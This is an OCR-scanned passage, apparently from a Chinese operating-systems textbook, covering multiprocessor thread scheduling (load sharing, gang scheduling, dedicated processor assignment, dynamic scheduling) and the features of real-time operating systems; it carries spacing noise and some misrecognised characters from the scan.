@ 负载 共享 : 进程 不 是 分 配 到 一 个 特定 的 处 理 器 。 系 统 维护 一 个 就 线 进 程 的 全 局 队列 ， 每 

个 处 理 器 只 要 空闲 就 从 队列 中 选择 一 个 线程 。 这 里 使 用 术语 “负载 共享 ”( load sharing ) 
来 区 分 这 种 策略 和 负载 平衡 (load balancing) 方案 ， 负 载 平衡 是 基于 一 种 比较 永久 的 分 
配方 案 分 配 工作 的 ( 见 [FEIT90a ])9。 

@ 组 调度 : 一 组 相关 的 线程 基于 一 对 一 的 原则 ， 同 时 调度 到 一 组 处 理 器 上 运行 。 

o 专用 处 理 器 分 配 : 这 种 方法 正好 与 负载 分 配 的 方法 相反 , 它 通 过 把 线程 指定 到 处 理 器 来 定义 
隐 式 的 调度 。 在 程序 执行 过 程 中 ,每 个 程序 被 分 配给 一 组 处 理 器 ,处理 器 的 数目 与 程序 中 线 
程 的 数目 相等 。 当 程序 终止 时 ， 处 理 器 返回 到 总 的 处 理 器 了 地 中 ， 可 供 分 配给 另 一 个 程序 。 

@ 动态 调度 : 在 执行 期 间 ， 进 程 中 线程 的 数目 可 以 改变 。 
负载 分 配 

负载 分 配 可 能 是 最 简单 的 方法 ,也 是 可 以 从 单 处 理 器 环境 中 直接 移 用 的 方法 。 它 有 以 下 优点 : 

© 负载 均匀 地 分 布 在 各 个 处 理 器 上 ， 确 保 当 有 工作 可 做 时 ， 没 有 处 理 器 是 空闲 的 。 

@ 不 需要 集中 调度 器 。 当 一 个 处 理 器 可 用 时 ， 操 作 系 统 调度 例 程 就 会 在 该 处 理 器 上 运行 ， 
以 选择 下 一 个 线程 。 

@ 可 以 使 用 第 9 章 讲述 的 任何 一 种 方案 组 织 和 访问 全 局 队列 ， 包 括 基于 优先 级 的 方案 和 考 
虑 了 执行 历史 或 预计 处 理 请 求 的 方案 。 

[ LEUT90 ] 分 析 了 三 种 不 同 的 负载 分 配方 案 : 

o 先 来 先 服务 (FCFS): 当 一 个 作业 到 达 时 ， 它 的 所 有 线程 都 被 连续 地 放置 在 共享 队列 末 
属 。 当 一 个 处 理 器 变 得 空闲 时 ， 它 选择 下 一 个 就 绪 线 程 执 行 ， 直 到 完成 或 被 阻塞 。 

@ 最 少 线 程 数 优先 : 共享 就 绪 队 列 被 组 织 成 一 个 优先 级 队列 ， 如 果 一 个 作业 包含 的 未 调度 
线程 的 数目 最 少 ， 则 给 它 指定 最 高 的 优先 级 。 具 有 相同 优先 级 的 队列 按 作业 到 达 的 顺序 
排队 。 和 FCFS 一 样 ， 被 调度 的 线程 一 直 运 行 到 完成 或 阻塞 。 

© 可 抢占 的 最 少 线程 数 优先 : 最 高 的 优先 级 给 予 包含 的 未 被 调度 的 线程 数目 最 少 的 作业 。 刚 到 
达 的 作业 如 果 包 含 的 线程 数目 少 于 正在 执行 的 作业 ， 它 将 抢占 属于 这 个 被 调度 作业 的 线程 。 

作者 通过 使 用 模拟 模型 说 明 , 对 于 很 多 种 作业 ,FCFS 优 于 上 面 列 出 的 另外 两 种 策略 。 此 外 ， 
作者 还 发 现 某 些 组 调度 (将 在 下 一 节 讲 述 ) 通常 优 于 负载 共享 。 

负载 分 配 有 以 下 缺点 : 


O 关于 这 一 问题 的 一 些 相关 文献 中 将 这 种 方法 称 为 自 调 度 ( self-scheduling ), 因为 每 一 个 处 理 器 调度 其 本 身 而 不 
考虑 其 他 处 理 器 。 然 而 ， 这 一 术语 在 一 些 文献 (如 [FOST91]) 中 也 用 于 表示 以 某 一 种 语言 编写 的 程序 允许 程序 
员 指 定 调度 算法 。 
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@ 中 心 队 列 占 据 了 必须 互 斥 访问 的 存储 器 区 域 。 因 此 ， 如 果 有 许多 处 理 器 同时 查找 工作 ， 
就 有 可 能 成 为 瓶颈 。 当 只 有 很 少 的 几 个 处 理 器 时 ， 这 不 是 什么 大 问题 ; 但 是 ， 当 多 处 理 
器 系统 包含 了 几 十 个 甚至 几 百 个 处 理 器 时 ， 就 可 能 真正 出 现 瓶 颈 。 
@ 被 抢占 的 线程 可 能 不 在 同一 个 处 理 器 上 恢复 执行 。 如 果 每 个 处 理 器 都 配备 一 个 本 地 高 速 
缓存 ， 缓 存 的 效率 会 很 低 。 
© 如 果 所 有 线程 被 看 做 是 一 个 公共 的 线程 池 ,， 则 一 个 程序 的 所 有 线程 不 可 能 都 同时 获得 访问 
处 理 器 。 如 果 一 个 程序 的 线程 间 需 要 高 度 的 合作 ， 所 涉及 的 进程 切换 就 会 严重 影响 性 能 。 
尽管 可 能 存在 许多 缺点 ， 负 载 分 配 仍然 是 当前 多 处 理 器 系统 中 使 用 得 最 多 的 一 种 方案 。 
Mach 操作 系统 中 使 用 了 一 种 改进 后 的 负载 分 配 技术 [ BLAC90，WEND89 ]。 操 作 系 统 为 每 
个 处 理 器 维护 一 个 本 地 运行 队列 和 一 个 共享 的 全 局 运行 队列 。 本 地 运行 队列 供 临时 绑 定 在 某 个 特 
定 处 理 器 上 的 进程 使 用 。 处理 器 首先 检查 本 地 运行 队列 , 使 得 绑 定 的 线程 绝对 优先 于 未 绑 定 的 线 
程 。 关 于 使 用 绑 定 线程 的 一 个 例子 是 用 一 个 或 多 个 处 理 器 专门 运行 属于 操作 系统 一 部 分 的 进程 。 
另 一 个 例子 是 特定 应 用 程序 的 线程 可 以 分 布 在 许多 处 理 器 上 , 通过 适当 的 附加 软件 , 它 可 以 提供 
对 组 调度 的 支持 ， 下 面 将 讨论 这 个 问题 。 
组 调度 
同时 在 一 组 处 理 器 上 调度 一 组 进程 的 概念 比 线程 的 使 用 要 早 。[ JONE80 ] 把 这 个 概念 称 为 成 
组 调度 ， 并 引用 了 以 下 优点 : 
@ 如 果 紧 密 相关 的 进程 并 行 执行 ,同步 阻塞 可 能 会 减少 , 并 且 可 能 只 需要 很 少 的 进程 切换 ， 
性 能 将 会 提高 。 
@ 调度 开销 可 能 会 减少 ， 因 为 一 个 决策 可 以 同时 影响 许多 处 理 器 和 进程 。 
在 Cm* 多 处 理 器 中 ,使 用 了 协同 调度 ( coscheduling ) 这 个 术语 [ GEHR87 ]。 协 同调 度 基 于 
调度 一 组 相关 任务 ( 称 做 特别 任务 ) 的 概念 。 特 别 任务 中 的 元 素 特别 小 , 接近 于 后 来 线程 的 概念 。 
术语 组 调度 ( gang scheduling) 已 经 应 用 于 同时 调度 组 成 一 个 进程 的 一 组 线程 [FEIT90b ]。 
对 于 中 等 粒度 到 细 粒 度 的 并 行 应 用 程序 , 组 调度 是 非常 必要 的 , 因为 如 果 这 种 应 用 程序 的 一 部 分 
准备 运行 ,而 另 一 部 分 却 还 没有 运行 时 , 它 的 性 能 会 严重 地 下 降 。 它 还 对 全 体 并 行 应 用 程序 都 有 
好 处 , 即使 那些 对 性 能 要 求 没 有 这 人 么 灵敏 的 应 用 程序 也 是 如 此 。 组 调度 的 必要 性 得 到 了 广 证 的 认 
可 ， 并 且 在 许多 多 处 理 器 操作 系统 中 都 得 到 了 实现 。 
组 调度 提高 应 用 程序 性 能 的 一 个 显著 方式 是 使 进程 切换 的 开销 最 小 ,假设 进程 的 一 个 线程 正 
在 执行 , 并 且 到 达 一 点 , 必须 与 该 进程 的 另 一 个 线程 在 该 处 同步 。 如 果 这 个 线程 没有 运行 , 但 是 
在 就 绪 队 列 中 , 则 第 一 个 线程 被 挂 起 ,直到 在 其 他 处 理 器 上 进行 了 进程 切换 并 得 到 了 需要 的 线程 。 
对 于 线程 间 需 要 紧密 合作 的 应 用 程序 , 这 种 切换 会 严重 地 降低 性 能 。 合作 线程 的 同时 调度 还 可 以 
节省 资源 分 配 的 时 间 。 例 如 ， 多 个 组 调度 的 线程 可 以 访问 一 个 文件 ， 而 不 需要 在 执行 定位 、 读 、 
写 操 作 时 进行 锁定 的 额外 开销 。 
组 调度 的 使 用 引发 了 对 处 理 器 分 配 的 要 求 。 一 种 可 能 的 情况 如 下 : 假设 有 NN 个 处 理 器 和 M 
个 应 用 程序 ， 每 个 应 用 程序 有 N 个 或 少 于 N 个 的 线程 。 那 么 ， 使 用 时 间 片 ， 每 个 应 用 程序 将 被 
给 予 M 个 处 理 器 中 可 用 时 间 的 1/M。[ FEIT90a ] 提示 这 个 策略 的 效率 可 能 很 低 。 考 虑 一 个 例子 ， 
有 两 个 应 用 程序 ， 一 个 有 4 个 线程 ， 另 一 个 有 一 个 线程 。 如 果 使 用 统一 的 时 间 分 配 ， 则 会 浪费 
37.5% 的 处 理 资源 ， 这 是 因为 当 这 个 单线 程 的 应 用 程序 运行 时 ， 其 余 的 三 个 处 理 器 是 空闲 的 (如 
图 10.3 所 示 )。 如 果 有 若干 个 只 有 一 个 线程 的 应 用 程序 ， 为 提高 处 理 器 的 利用 率 ， 可 以 把 它们 一 
起 分 配 。 如 果 这 个 选项 不 可 用 ， 另 一 种 可 供 选 择 的 统一 调度 方法 是 根据 线程 数 加 权 调 度 。 因 此 ， 
给 有 4 个 线程 的 应 用 程序 4/5 的 时 间 ， 给 只 有 一 个 线程 的 应 用 程序 1/5 的 时 间 ， 处 理 器 的 浪费 降 
低 到 15%。 
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统一 划分 加 权 划 分 
组 1 组 2 





/5 1/5 
浪费 37.5% 浪费 15% 


时 间 1/2 1/2 4 


图 10.3 4 个 线程 和 1 个 线程 的 组 调度 例子 FEIT 90b ] 


专用 处 理 器 分 配 

[ TUCK89 ] 中 给 出 了 组 调度 的 一 种 极端 形式 ， 在 一 个 应 用 程序 执行 期 间 ， 把 一 组 处 理 器 专 
门 分 配给 这 个 应 用 程序 。 也 就 是 说 ， 当 一 个 应 用 程序 被 调度 时 , 它 的 每 一 个 线程 都 被 分 配给 一 个 
处 理 器 ， 这 个 处 理 器 专门 用 于 处 理 这 个 线程 ， 直 到 应 用 程序 运行 结束 。 

这 个 方法 看 上 去 极其 浪费 处 理 器 时 间 ， 如果 应 用 程序 的 一 个 线程 被 阻塞 ,等待 1/O 或 与 其 他 
线程 的 同步 , 则 该 线程 的 处 理 器 一 直 处 于 空闲 : 处 理 器 没有 多 道 程序 设计 。 以 下 两 点 可 以 在 一 定 
程度 上 解释 使 用 这 种 策略 的 原因 : | 

1 ) 在 一 个 高 度 并 行 的 系统 中 ， 有 数 十 个 或 数 百 个 处 理 器 ， 每 个 处 理 器 只 占 系统 总 代价 的 一 

小 部 分 ， 处 理 器 利用 率 不 再 是 衡量 有 效 性 或 性 能 的 一 个 重要 因素 。 

2) 在 一 个 程序 的 生命 周期 中 避免 进程 切换 会 加 快 程序 的 运行 速度 。 

[ TUCK89 ] 和 [ZAHO90 ] 给 出 了 关于 支 7 
持 论述 2 的 分 析 , 图 10.4 显示 了 一 个 实验 结果 
[TUCK89 ]。 作 者 同时 运行 两 个 应 用 程序 (并 5 "4 
发 地 执行 ), 在 16 个 处 理 器 系统 上 计算 和 矩阵 乘 eu a 
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和 快速 傅 里 时 变换 ( FFT )。 每 个 应 用 程序 把 它 
的 问题 划分 成 许多 小 任务 ， 每 个 任务 映射 到 执 
行 该 应 用 程序 的 一 个 线程 中 。 程 序 使 用 的 线程 
数目 可 变 。 实际 上 , 应 用 程序 定义 了 许多 任务 ， 
并 对 它们 进行 排队 。 应 用 程序 从 队列 中 取出 任 人 








务 并 映射 到 一 个 可 用 的 线程 中 。 如 果 线 程 数 比 进程 个 数 
任务 数 少 ， 剩 余 的 任务 仍然 留 在 队列 中 ， 线 程 图 10.4 ”作为 进程 个 数 的 函数 的 应 用 
完成 分 配给 自己 的 任务 后 再 选择 执行 这 些 任 程序 加 速 比 [TUCK89 ] 


务 。 显然 , 不 是 所 有 的 应 用 程序 都 可 以 按 这 种 方案 构造 , 但 是 许多 数值 问题 和 其 他 一 些 应 用 可 以 
采用 这 种 方式 处 理 。 

图 10.4 给 出 了 每 个 应 用 程序 中 执行 任务 的 线程 数 从 1 变化 到 24 时 ,应 用 程序 的 加 速 比 情况 。 
例如 ， 当 两 个 应 用 程序 都 从 同时 执行 24 个 线程 开始 ， 与 每 个 应 用 程序 都 只 使 用 一 个 线程 相 比 ， 
和 矩阵 乘 的 速度 增加 了 2.8 倍 ，FFT 的 速度 增加 了 2.4 倍 。 该 图 表示 ， 当 每 个 应 用 程序 的 线程 数目 
超过 8， 从 而 使 得 系统 中 的 进程 总 数 超过 处 理 器 数目 时 ， 整 个 应 用 程序 的 性 能 开始 变 差 。 此 外 ， 
线程 的 数目 越 多 , 应 用 程序 的 性 能 越 差 , 因 为 这 时 线程 抢占 和 再 次 调度 的 频率 增 大 。 过 多 的 抢占 
导致 许多 资源 的 使 用 效率 降低 , 包括 等 待 挂 起 线程 离开 临界 区 的 时 间 、 进 程 切 换 中 浪费 的 时 间 和 
低 效 的 高 速 缓 存 行为 。 

”作者 推断 , 比较 有 效 的 策略 是 限制 活跃 线程 的 数目 不 超过 系统 中 处 理 器 的 数目 。 如 大 多 数 应 
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用 程序 或 者 只 有 一 个 线程 ， 或 者 可 以 使 用 任务 队列 结构 ， 这 种 策略 将 提供 对 处 理 器 资源 更 有 效 、 
更 合理 的 使 用 。 
专用 处 理 器 分 配 和 组 调度 ， 在 解决 处 理 器 分 配 问 题 时 都 对 调度 问题 进行 了 择 击 。 可 以 看 出 ， 
多 处 理 器 系统 中 的 处 理 器 分 配 问题 更 类 似 于 单 处 理 器 中 的 存储 器 分 配 问题 ,而 不 是 单 处 理 器 中 的 
调度 问题 。 在 某 一 给 定 的 时 刻 , 给 一 个 程序 分 配 多 少 个 处 理 器 , 这 个 问题 类 似 于 在 某 一 给 定时 刻 ， 
给 一 个 进程 分 配 多 少 页 框 , | GEHR87 ] 提 出 一 个 类 似 于 虚拟 内 存 中 工作 集 的 术语 一 一 活动 工作 集 
(activity working set )， 活 动工 作 集 指 的 是 ， 为 了 保证 应 用 程序 以 可 以 接受 的 速度 继续 进行 ,在 
处 理 器 上 必须 同时 调度 的 最 少数 目的 活动 (线程 )。 和 存储 器 管理 方案 一 样 ， 调 度 活动 工作 集中 
所 有 元 素 时 的 失败 可 能 导致 处 理 器 抖动 。 当 调度 需要 其 服务 的 线程 , 从 而 导致 很 快 将 要 用 到 其 服 
务 的 线程 被 取消 调度 时 , 就 会 发 生 这 种 情况 。 类 似 地 , 处 理 器 碎片 指 当 一 些 处 理 器 剩余 而 其 他 处 
理 器 已 被 分 配 时 ,剩余 的 处 理 器 无 论 从 数量 上 还 是 从 适合 程度 上 都 难以 支持 正在 等 待 的 应 用 程序 
的 需要 。 组 调度 利 专用 处 理 器 分 配 有 意 要 避免 这 些 问 题 。 
动态 调度 
某 些 应 用 程序 可 能 提供 了 语言 和 系统 工具 , 允许 动态 地 改变 进程 中 的 线程 数目 , 这 就 使 得 操 
作 系 统 可 以 通过 调整 负载 情况 来 提高 利用 率 。 
[ ZAHO90 |] 提出 了 一 种 方法 ， 使 得 操作 系统 和 应 用 程序 能 够 共同 进行 调度 决策 。 操 作 系 统 
负责 把 处 理 器 分 配给 作业 , 每 个 作业 通过 把 它 的 一 部 分 可 运行 任务 映射 到 线程 , 使 用 当前 划分 给 
它 的 处 理 器 执行 这 些 任 务 。 关 于 运行 哪个 子 集 以 及 当 该 进程 被 抢占 时 应 该 挂 起 哪个 线程 之 类 的 决 
策 留 给 单个 的 应 用 程序 ( 可 能 通过 一 组 运行 时 库 例 程 )。 这 种 方法 并 不 适合 于 所 有 的 应 用 程序 。 
某 些 应 用 程序 可 能 会 默认 使 用 一 个 线程 ， 而 其 他 应 用 程序 可 以 设计 成 使 用 操作 系统 的 这 种 功能 。 
在 这 个 方法 中 ,操作 系统 的 调度 责任 主要 局 限于 处 理 器 分 配 ， 并 根据 以 下 策略 继续 进行 。 当 一 
个 作业 请 求 一 个 或 多 个 处 理 器 时 (或 者 是 因为 作业 第 一 次 到 达 , 或 者 是 因为 它 的 请 求 发 生 了 变化 ): 
1) 如 果 有 空闲 的 处 理 器 ， 则 用 它们 满足 请 求 。 
2) 否则 ， 如 果 发 请 求 的 作业 是 新 到 达 的 ， 则 从 当前 已 分 配 了 多 个 处 理 器 的 作业 中 分 出 一 个 
处 理 器 给 这 个 作业 。 

3) 如 果 这 个 请 求 的 任何 分 配 都 不 能 得 到 满足 ， 则 它 保持 未 完成 状态 ， 直 到 一 个 处 理 器 变 成 
可 用 ,或 者 该 作业 废除 了 它 的 请 求 ( 例如 ， 如 果 不 再 需要 额外 的 处 理 器 )。 

当 释 放 了 一 个 或 多 个 处 理 器 ( 包括 作业 离开 ) 时 : 

4 ) 为 这 些 处 理 器 扫描 当前 未 得 到 满足 的 请 求 队列 。 给 表 中 每 个 当前 还 没有 处 理 器 的 作业 ( Ep 
给 所 有 处 于 等 待 的 新 到 达 的 作业 ) 分 配 一 个 处 理 器 。 然 后 再 次 扫描 这 个 表 ， 按 FCFS 原 
则 分 配 剩 下 的 处 理 器 。 

[ ZAHO90 ] 和 [ MAJU88 ] 中 的 分 析 表 明 ， 对 可 以 采用 动态 调度 的 应 用 程序 ,这 种 方法 优 于 
组 调度 和 专用 处 理 器 分 配 。 但 是 , 该 方法 的 开销 可 能 会 抵消 它 的 一 部 分 性 能 优势 。 为 证 明 动 态 调 
度 的 价值 ， 需 要 在 实际 系统 中 不 断 体 验 。 


10.2 ”实时 调度 


10.2.1 背景 


实时 计算 正在 成 为 越 来 越 重要 的 原则 。 操作 系 统 , 特别 是 调度 器 ,可 能 是 实时 系统 中 最 重要 
的 组 件 。 目 前 实时 系统 应 用 的 例子 包括 实验 控制 、 过 程控 制 设备 、 机 器 人 、 空 中 交通 管制 、 电 信 、 
军事 指挥 与 控制 系统 ,下 一 代 系 统 还 将 包括 自动 驾驶 汽车 、 具 有 弹性 关节 的 机 器 人 控制 器 、 智 能 
化 生产 中 的 系统 查找 、 空 间 站 和 海底 勘探 等 。 
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实时 计算 可 以 定义 成 这 样 的 一 类 计算 , 即 系统 的 正确 性 不 仅 取决 于 计算 的 逻辑 结果 , 而 且 还 
依赖 于 产生 结果 的 时 间 。 我 们 可 以 通过 定义 实时 进程 或 实时 任务 来 定义 实时 系统 e 。 一 般 来 说 ， 
在 实时 系统 中 , 某 些 任务 是 实时 任务 ,它们 具有 一 定 的 紧急 程度 。 这 类 任务 试图 控制 外 部 世界 发 
生 的 事件 , 或 者 对 这 些 事件 做 出 反应 。 由 于 这 些 事 件 是 “实时 ”发 生 的 ,因而 实时 任务 必须 能 够 
跟 得 上 它 所 关注 的 事件 。 因 此, 通常 给 一 个 特定 的 任务 制定 一 个 最 后 期 限 ,最 后 期 限 指定 开始 时 
间或 结束 时 间 。 这 类 任务 可 以 分 成 硬 实时 任务 或 软 实时 任务 两 类 。 硬 实时 任务 指 必须 满足 最 后 期 
限 的 限制 , 否则 会 给 系统 带 来 不 可 接受 的 破坏 或 者 致命 的 错误 。 软 实时 任务 也 有 一 个 与 之 关联 的 
最 后 期 限 ， 并 希望 能 满足 这 个 期 限 的 要 求 , 但 这 并 不 是 强制 的 ， 即 使 超过 了 最 后 期 限 , 调度 和 完 
成 这 个 任务 仍然 是 有 意义 的 。 

实时 任务 的 另 一 个 特征 是 它们 是 周期 的 还 是 非 周期 的 。 非 周期 任务 有 一 个 必须 结束 或 开始 的 
最 后 期 限 , 或 者 有 一 个 关于 开始 时 间 和 结束 时 间 的 约束 。 而 对 于 周期 任务 ,这 个 要 求 描述 成 “每 
隔 周期 了 一 次 ”或 者 “每 隔 了 个 单位 一 次 ”。 


10.22 实时 操作 系统 的 特点 


实时 操作 系统 可 以 被 描述 成 具备 以 下 5 方面 的 要 求 [ MORG92 ]: 可 确定 性 、 可 响应 性 、 用 
户 控制 、 可 靠 性 、 故 障 弱 化 操作 。 

一 个 操作 系统 是 可 确定 性 的 ( deterministic )， 在 某 种 程度 上 是 指 它 可 以 按照 固定 的 、 预 先 确 
定 的 时 间或 时 间 间 隔 执行 操作 。 当 多 个 进程 竞争 使 用 资源 和 处 理 器 时 间 时 , 没有 哪个 系统 是 完全 
可 确定 的 。 在 实时 操作 系统 中 , 进程 请 求 服务 是 用 外 部 事件 和 时 间 安 排 来 描述 的 。 操 作 系 统 可 以 
确定 性 地 满足 请 求 的 程度 首先 取决 于 它 响 应 中 断 的 速度 ,其 次 取决 于 系统 是 否 具有 足够 的 能 力 在 
要 求 的 时 间 内 处 理 所 有 的 请 求 。 

关于 操作 系统 可 确定 性 能 力 的 一 个 非常 有 用 的 度量 是 从 高 优先 级 设备 中 断 到 达到 开始 服务 
之 间 的 延迟 。 在 非 实时 操作 系统 中 , 这 个 延迟 可 以 是 几 十 到 几 百 毫秒 ， 而 在 实时 操作 系统 中 , 这 
个 延迟 的 上 限 可 以 从 几 微 秒 到 1 毫秒 。 

一 个 相关 但 截然 不 同 的 特点 是 可 响应 性 (responsiveness )。 确 定性 关注 的 是 操作 系统 获知 有 
一 个 中 断 之 前 的 延迟 , 响应 性 关注 的 是 在 知道 中 断 之 后 操作 系统 为 中 断 提供 服务 的 时 间 。 响 应 性 
包括 以 下 几 方 面 : 

1) 最 初 处 理 中 断 并 开始 执行 中 断 服务 例 程 CSR) 所 需要 的 时 间 总 量 。 如 果 ISR 的 执行 需要 

一 次 进程 切换 ， 需 要 的 延迟 将 比 在 当前 进程 上 下 文 环境 中 执行 ISR 的 延迟 长 。 

2) 执行 ISR 所 需要 的 时 间 总 量 ， 这 通常 与 硬件 平台 有 关 。 

3 ) .中断 垦 套 的 影响 。 如 果 一 个 ISR 可 以 被 另 一 个 中 断 的 到 达 而 中 断 ， 服 务 将 被 延迟 。 

确定 性 和 可 响应 性 共同 组 成 了 对 外 部 事件 的 响应 时 间 。 对 实时 系统 来 说 , 响应 时 间 的 要 求 是 
非常 重要 的 ， 因 为 这 类 系统 必须 满足 系统 外 部 的 个 体 、 设 备 和 数据 流 所 强加 的 时 间 要 求 。 

用 户 控制 (user control) 在 实时 操作 系统 中 通常 比 在 普通 操作 系统 中 应 用 更 广泛 。 在 典型 的 
非 实 时 操作 系统 中 ,用 户 要 人 么 对 操作 系统 的 调度 功能 没有 任何 控制 ,要么 仅 提 供 了 概括 性 的 指导 ， 
诸如 把 用 户 分 成 多 个 优先 级 组 。 但 在 实时 系统 中 , 允许 用 户 细 粒度 地 控制 任务 优先 级 是 必 不 可 少 
的 。 用 户 应 该 能 够 区 分 硬 实时 任务 和 软 实时 任务 , 并 且 在 每 一 类 中 确定 相对 优先 级 。 实 时 系统 还 
允许 用 户 指定 一 些 特 性 , 例如 使 用 页 面 调度 还 是 进程 交换 、 哪 一 个 进程 必须 常 驻 内 存 、 使 用 何 种 
磁盘 传输 算法 、 不 同 优先 级 的 进程 各 有 了 哪些 权限 等 。 

可 靠 性 (reliability ) 在 实时 系统 中 比 在 非 实 时 系统 中 更 重要 。 非 实时 系统 中 的 暂时 故障 可 以 


O 通常 ,术语 会 带 来 问题 ， 因 为 在 文献 中 不 同 的 用 词 会 具有 不 同 的 含义 。 一 个 特定 的 进程 在 重复 性 的 实时 约束 
下 进行 操作 ， 这 种 情况 是 很 常见 的 。 即 该 进程 持续 很 长 一 段 时 间 ， 并 且 在 这 段 时 间 内 ， 进 行 一 些 重复 的 功能 
以 响应 实时 性 的 事件 。 我 们 在 本 节 中 把 一 个 单独 的 功能 称 为 一 个 任务 。 从 而 可 以 把 进程 看 成 是 处 理 一 系列 任 
务 的 进展 。 在 任意 给 定 的 时 刻 ， 该 进程 正在 进行 一 个 单独 的 任务 时 ， 正 是 该 进程 /任务 必须 被 预先 安排 好 。 
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简单 地 通过 重新 启动 系统 来 解决 ， 多 处 理 器 非 实 时 系统 中 的 处 理 器 失败 可 能 导致 服务 级 别 降 低 ， 
直到 发 生 故 障 的 处 理 器 被 修复 或 替换 。 但 是 实时 系统 是 实时 地 响应 和 控制 事件 , 性 能 的 损失 或 降 
低 可 能 产生 灾难 性 的 后 果 ， 从 资金 损失 到 般 坏 主要 设备 甚至 危及 生命 。 

和 其 他 领域 一 样 , 实时 和 非 实时 操作 系统 的 区 别 只 是 一 个 程度 问题 , 即使 实时 系统 也 必须 设 
计 成 响应 各 种 故障 模式 。 故 障 弱 化 操作 ( fail-soft operation ) 指 系统 在 故障 时 尽 可 能 多 地 保存 其 
性 能 和 数据 的 能 力 。 例 如 一 个 典型 的 传统 UNIX 系统 ， 当 它 检 测 到 内 核 中 的 数据 错误 时 , 给 系统 
控制 台 产 生 一 个 故障 信息 ,并 为 了 以 后 分 析 故 障 , 把 内 存 中 的 内 容 转 储 到 磁盘 , 然后 终止 系统 的 
执行 。 与 之 相反 ,实时 系统 将 尝试 改正 这 个 问题 或 者 最 小 化 它 的 影响 并 继续 执行 。 典 型 地 ， 系 统 
通知 朋 户 或 用 户 进程 , 它 试 图 进行 矫正 , 并 且 可 能 在 降低 了 的 服务 级 别 上 继续 运行 。 当 需要 关机 
时 ， 必 须 维护 文件 和 数据 的 一 致 性 。 

故障 弱化 运行 的 一 个 重要 特征 称 做 稳定 性 。 我 们 说 一 个 实时 系统 是 稳定 的 , 是 指 如 果 当 它 不 
可 能 满足 所 有 任务 的 最 后 期 限时 , 即使 总 是 不 能 满足 一 些 不 太 重 要 任务 的 最 后 期 限 , 系统 也 将 首 
先 满足 最 重要 的 、 优 先 级 最 高 的 任务 的 最 后 期 限 。 

为 满足 前 面 的 要 求 ， 当 前 的 实时 操作 系统 典型 地 包括 以 下 特征 [ STAN89 ]: 

@ 快速 的 进程 或 线程 切换 
体积 小 ( 只 具备 最 小 限度 的 功能 ) 
迅速 响应 外 部 中 断 的 能 力 
通过 诸如 信号 量 、 信 号 和 事件 之 类 进程 间 通 信 工 具 ， 实 现 多 任务 处 理 
使 用 特殊 的 顺序 文件 ， 可 以 快速 存储 数据 
基于 优先 级 的 抢占 式 调 度 
最 小 化 禁止 中 断 的 时 间 间 隔 
用 于 使 任务 延迟 一 段 固定 的 时 间或 暂停 /恢复 任务 的 原 语 

@ 特别 的 警报 和 超时 设 定 

实时 系统 的 核心 是 短程 任务 调度 器 。 在 设计 这 种 调度 器 时 , 公平 性 和 最 小 平均 响应 时 间 并 不 
是 最 重要 的 ， 最 重要 的 是 所 有 硬 实时 任务 都 在 它们 的 最 后 期 限 内 完成 (或 开始 )， 尽 可 能 多 的 软 
实时 任务 也 可 以 在 它们 的 最 后 期 限 内 完成 (或 开始 )。 

大 多 数 当 代 实 时 操作 系统 都 不 能 直接 处 理 最 后 期 限 , 它 们 设计 成 尽 可 能 地 对 实时 任务 做 出 响 
应 , 使 得 当 临 近 最 后 期 限时 ,一 个 任务 能 够 迅速 地 被 调度 。 从 这 一 点 看 ,实时 应 用 程序 在 许多 条 
件 下 都 要 求 确定 性 的 响应 时 间 在 几 毫 秒 到 小 于 1 毫秒 的 范围 内 。 前 沿 应 用 程序 , 如 军用 飞机 模拟 
器 ， 通 常 要 求 响应 时 间 在 10 ~ 100 微 秒 的 范围 内 [ATLA89 ]。 

图 10.5 显示 了 许多 种 可 能 性 。 在 使 用 简单 轮转 调度 的 抢占 式 调度 器 中 ， 实 时 任务 将 被 加 入 到 
就 绪 队 列 中 ， 等 待 它 的 下 一 个 时 间 片 ， 如 图 10.5a 所 示 。 在 这 种 情况 下 ， 调 度 时 间 通 常 是 实时 应 
用 程序 难以 接受 的 ,在 非 抢 占 式 调 度 器 中 , 可 以 使 用 优先 级 调度 机 制 , 给 实时 任务 更 高 的 优先 级 。 
在 这 种 情况 下 ， 只 要 当前 的 进程 阻塞 或 运行 结束 ， 就 可 以 调度 这 个 就 绪 的 实时 任务 ， 如 图 10.5b 
所 示 。 如 果 在 临界 时 间 中 ， 一 个 比较 慢 的 低 优 先 级 任务 正在 执行 ， 就 会 导致 几 秒 的 延迟 ， 同 样 ， 
这 种 方法 也 是 难以 接受 的 。 一 种 比较 折衷 的 方法 是 把 优先 级 和 基于 时 钟 的 中 断 结 合 起 来 。 可 抢占 
点 按 规则 的 间隔 出 现 。 当 出 现 一 个 可 抢占 点 时 , 如 果 有 更 高 优先 级 的 任务 正在 等 待 , 则 当前 运行 
的 任务 被 抢占 。 这 就 有 可 能 抢占 操作 系统 内 核 的 部 分 任务 。 这 类 延迟 大 约 为 几 毫 秒 ， 如 图 10.5c 
所 示 。 尽 管 最 后 一 种 方法 对 某 些 实时 应 用 程序 已 经 足够 了 , 但 是 对 一 些 要 求 更 苛刻 的 应 用 程序 
仍 是 不 够 的 ， 这 时 常常 采用 一 种 称 做 立即 抢占 的 方法 。 在 这 种 情况 下 ， 操 作 系 统 几乎 是 立即 响 
应 一 个 中 断 , 除非 系统 处 于 临界 代码 保护 区 中 。 关 于 实时 任务 的 调度 延迟 可 以 降低 到 100 微 秒 
或 更 少 。 
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来 自 实 时 进程 的 请 求 ”实时 进程 被 添加 到 运行 队列 
中 ,等待 它 的 下 一 个 时 间 片 





et eee 调度 时 间 一 
a) 轮转 抢占 式 调度 器 


来 自 实时 进程 的 请 求 ”实时 进程 被 添加 
; 到 运行 队列 关 





SS 
4 一 调度 时 间 — 当前 进程 阻塞 或 完成 
b) 优先 级 驱动 非 抢 占 式 调度 器 
来 自 实时 进程 的 请 求 





调度 时 间 
c) 优先 级 驱动 、 在 抢占 点 抢占 的 调度 器 
来 自 实时 进程 的 请 求 
实时 进程 抢占 当前 
i 进程 并 立即 执行 





+> 调度 时 间 
d) 立即 抢占 式 调 度 器 
图 10.5 ”实时 进程 调度 


10.2.3 ”实时 调度 
实时 调度 是 计算 机 科学 中 最 活跃 的 研究 领域 之 一 。 本 节 将 给 出 各 种 实时 调度 方法 的 概述 ， 并 
看 看 两 类 流行 的 调度 算法 。 . 
在 考察 实时 调度 算法 时 ， [ RAMA94 ] 观察 到 各 种 调度 方法 取决 于 一 个 系统 是 否 执行 可 调度 
